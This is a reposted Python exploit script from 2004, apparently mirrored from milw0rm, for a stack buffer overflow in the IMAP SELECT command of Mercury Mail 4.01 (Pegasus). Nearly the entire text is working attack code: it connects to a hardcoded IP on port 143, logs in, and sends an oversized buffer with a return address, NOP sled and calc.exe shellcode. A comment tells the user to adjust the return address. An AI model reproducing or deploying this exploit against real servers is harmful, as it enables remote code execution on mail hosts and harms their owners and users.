Mercury Mail 4.01 Pegasus IMAP Buffer Overflow Exploit by h3m4n

VIEWS: 29 PAGES: 1

									                                Mercury Mail 4.01 Pegasus IMAP Buffer Overflow Exploit   Page 1/1
  1




  2    #########################################################
  3    #                                                       #
  4    # Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow      #
  5    # Discovered by : Muts                                  #
  6    # Coded by : Muts                                       #
  7    # WWW.WHITEHAT.CO.IL                                    #
  8    # Plain vanilla stack overflow in the SELECT command    #
  9    #                                                       #
  10   #########################################################
  11
  12
  13   import struct
  14   import socket
  15   from time import sleep
  16
  17   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  18
  19   # Lame calc.exe shellcode − dont expect miracles!
  20
  21   sc2   = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x29\x81\x73\x17\xb1\x74"
  22   sc2   += "\x3f\x7c\x83\xeb\xfc\xe2\xf4\x4d\x9c\x69\x7c\xb1\x74\x6c\x29\xe7"
  23   sc2   += "\x23\xb4\x10\x95\x6c\xb4\x39\x8d\xff\x6b\x79\xc9\x75\xd5\xf7\xfb"
  24   sc2   += "\x6c\xb4\x26\x91\x75\xd4\x9f\x83\x3d\xb4\x48\x3a\x75\xd1\x4d\x4e"
  25   sc2   += "\x88\x0e\xbc\x1d\x4c\xdf\x08\xb6\xb5\xf0\x71\xb0\xb3\xd4\x8e\x8a"
  26   sc2   += "\x08\x1b\x68\xc4\x95\xb4\x26\x95\x75\xd4\x1a\x3a\x78\x74\xf7\xeb"
  27   sc2   += "\x68\x3e\x97\x3a\x70\xb4\x7d\x59\x9f\x3d\x4d\x71\x2b\x61\x21\xea"
  28   sc2   += "\xb6\x37\x7c\xef\x1e\x0f\x25\xd5\xff\x26\xf7\xea\x78\xb4\x27\xad"
  29   sc2   += "\xff\x24\xf7\xea\x7c\x6c\x14\x3f\x3a\x31\x90\x4e\xa2\xb6\xbb\x5a"
  30   sc2   += "\x6c\x6c\x14\x29\x8a\xb5\x72\x4e\xa2\xc0\xac\xe2\x1c\xcf\xf6\xb5"
  31   sc2   += "\x2b\xc0\xaa\xdb\x74\xc0\xac\x4e\xa4\x55\x7c\x59\x95\xc0\x83\x4e"
  32   sc2   += "\x17\x5e\x10\xd2\x5a\x5a\x04\xd4\x74\x3f\x7c"
  33
  34   #Change RET Address as needed
  35   buffer = ’\x41’*260 + struct.pack(’<L’, 0x782f28f7)+ ’\x90’*32+sc2
  36
  37   print "\nSending evil buffer..."
  38   s.connect((’192.168.1.167’,143))
  39   s.send(’a001 LOGIN ftp ftp’ + ’\r\n’)
  40   data = s.recv(1024)
  41   sleep(3)
  42   s.send(’A001 SELECT ’ + buffer+’\r\n’)
  43   data = s.recv(1024)
  44   s.close()
  45   print "\nDone! "
  46
  47   # milw0rm.com [2004−11−29]



muts                                                                                     11/29/2004

								
To top